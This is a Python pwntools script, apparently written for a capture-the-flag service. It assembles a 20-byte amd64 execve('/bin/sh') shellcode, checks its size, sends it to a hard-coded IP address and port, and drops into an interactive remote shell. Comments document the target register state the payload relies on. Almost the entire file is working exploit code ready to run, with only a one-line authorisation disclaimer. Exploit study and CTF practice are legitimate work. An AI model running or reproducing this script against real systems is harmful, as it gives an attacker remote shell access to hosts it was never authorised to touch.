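# -*- coding: utf-8 -*-
"""Deliver a 0x14-byte execve("/bin/sh") payload to a remote service and
drop into an interactive session.

The payload sets only rax (syscall number) and rdi (path).  It therefore
relies on the target's register state at the moment it jumps into the
received buffer -- presumably a CTF service; verify against the binary:

* rax must hold a pointer to a pointer to the received buffer
  (``mov rdi, [rax]``),
* rbp must be 0, so that ``lea eax, [ebp + 0x3b]`` yields 0x3b = SYS_execve
  (the 32-bit addressing form is chosen to keep the encoding short),
* rsi and rdx must already be NULL or point at a valid argv/envp, because
  the payload does not touch them.

Only use this against a host you are authorised to test.
"""
from pwn import *

context.update(arch='amd64', os='linux')

HOST = '114.177.250.4'
PORT = 2210
MAX_LEN = 0x14          # byte budget the remote accepts for the payload
PATH = b"/bin/sh"       # bytes literal so the concatenation below works on Python 2 and 3
PATH_OFFSET = 13        # expected size of the machine code; "/bin/sh" follows it


def build_shellcode():
    """Assemble the payload: [PATH_OFFSET bytes of code][b"/bin/sh"].

    The code and the path together fill the whole MAX_LEN budget, so the
    path's terminating NUL is NOT part of what is sent.  execve() only finds
    a proper C string if the byte following the received data is already
    zero on the target (e.g. a zero-initialised buffer) -- TODO confirm.

    Returns:
        bytes: machine code immediately followed by ``/bin/sh``.

    Raises:
        RuntimeError: if the assembled code is not PATH_OFFSET bytes long
            (the ``add rdi`` immediate would then not point at the path), or
            if the complete payload exceeds MAX_LEN.  An explicit raise is
            used instead of ``assert`` so the check survives ``python -O``.
    """
    # rdi  = *rax                      (assumed: address of this buffer)
    # rax  = ebp + 0x3b = 0x3b         (assumed: ebp == 0) -> SYS_execve
    # rdi += PATH_OFFSET               -> points at "/bin/sh" after the code
    # syscall
    code = asm("""
        mov rdi, [rax]
        lea eax, [ebp + 0x3b]
        add rdi, {off}
        syscall
    """.format(off=PATH_OFFSET))

    if len(code) != PATH_OFFSET:
        raise RuntimeError(
            "assembled code is %d bytes, expected %d" % (len(code), PATH_OFFSET))

    payload = code + PATH
    if len(payload) > MAX_LEN:
        raise RuntimeError(
            "payload is %d bytes, limit is %d" % (len(payload), MAX_LEN))
    return payload


def main():
    """Build the payload, show it for inspection, send it, go interactive."""
    shellcode = build_shellcode()
    # The disassembly also decodes the trailing "/bin/sh" bytes as if they
    # were instructions; that tail is data and can be ignored.
    print(disasm(shellcode))
    print(len(shellcode))

    s = remote(HOST, PORT)
    try:
        s.send(shellcode)
        s.interactive()
    finally:
        s.close()


if __name__ == "__main__":
    main()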